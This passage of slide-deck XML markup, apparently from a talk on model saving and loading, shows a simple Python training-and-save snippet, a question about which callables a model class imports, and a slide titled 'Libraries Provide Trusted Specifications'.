              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="665" name="Google Shape;665;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487991" y="3351301"/>
            <a:ext cx="841200" cy="808800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="25475">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="122200" lIns="122200" spcFirstLastPara="1" rIns="122200" wrap="square" tIns="122200">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1871"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="666" name="Google Shape;666;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487991" y="3351300"/>
            <a:ext cx="840977" cy="808511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="667" name="Google Shape;667;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2719361" y="3607802"/>
            <a:ext cx="840965" cy="784798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668" name="Google Shape;668;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="963300"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Saver</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="669" name="Google Shape;669;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5412875" y="953595"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Loader</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="670" name="Google Shape;670;p57"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3445200" y="2562150"/>
            <a:ext cx="1999200" cy="719700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="671" name="Google Shape;671;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6201325" y="2604525"/>
            <a:ext cx="2746500" cy="863700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Q: Should a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> need to import these callables?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Google Shape;672;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6201325" y="3595125"/>
            <a:ext cx="2746500" cy="863700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>A: We can look at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> class definition.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="673" name="Google Shape;673;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="1332600"/>
            <a:ext cx="3427500" cy="1477500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent6"/>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chemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from lib import Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>train(model, corpus)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.save(‘model.bin’)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="674" name="Google Shape;674;p57"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993550" y="2879550"/>
            <a:ext cx="646200" cy="402300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="lt2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxn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8" name="Shape 678"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="679" name="Google Shape;679;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="1332600"/>
            <a:ext cx="3427500" cy="1477500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent6"/>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chemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from lib import Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>train(model, corpus)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.save(‘model.bin’)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="680" name="Google Shape;680;p58"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993550" y="2879550"/>
            <a:ext cx="646200" cy="402300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="lt2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="Google Shape;681;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3711800" y="3226200"/>
            <a:ext cx="3188100" cy="1166400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en" sz="1200">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Imports:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.Model</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>torch.Tensor</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.read_weights_from_file</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.GradDescent</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="682" name="Google Shape;682;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Insight: Libraries Provide Trusted Specifications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="683" name="Google Shape;683;p58"/>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684" name="Google Shape;684;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5394500" y="1332600"/>
            <a:ext cx="3649500" cy="1046700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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rgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
